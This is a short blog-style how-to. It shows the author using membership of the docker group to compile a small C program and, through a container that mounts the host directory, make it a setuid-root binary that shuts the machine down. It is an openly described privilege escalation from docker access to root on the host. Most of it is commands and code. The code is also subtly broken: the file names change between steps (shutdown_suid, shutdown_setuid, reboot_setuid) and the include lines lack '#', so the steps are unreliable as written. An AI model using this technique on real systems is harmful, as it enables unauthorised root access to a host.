I was amazed at how easy this was. I found a couple different websites that lead me to this, giving credit where credit is due
1. http://yatb.giacomodrago.com/en/post/10/shutdown-linux-system-from-within-php-script.html
2. http://reventlov.com/advisories/using-the-docker-command-to-root-the-host
So putting 1 and 2 together. I have my docker install running as the “docker” user, so no “sudo” required. All I did (as docker) is :
1. Create the following snippet of C code shutdown_suid.c :
docker $> vi shutdown_suid.c
include <stdlib.h>
include <unistd.h>
int main() {
setuid(0);
system(“/sbin/shutdown -h now”); /* change this to the actual location of shutdown */
return 0;
}
2. Compile it :docker $> gcc -o shutdown_setuid shutdown_setuid.c
3. Exploit docker to mount the current directory and set rebuild_setuid to be owned as root and turn on the setuid permissions :
docker $> docker run -v $PWD:/stuff -t dockerdev/rhel /bin/bash -c ‘chown root.root /stuff/reboot_setuid && chmod a+s /stuff/reboot_setuid’
4. docker $> ls -la shutdown_setuid
-rwsrwsr-x. 1 root root 6623 May 29 11:54 shutdown_setuid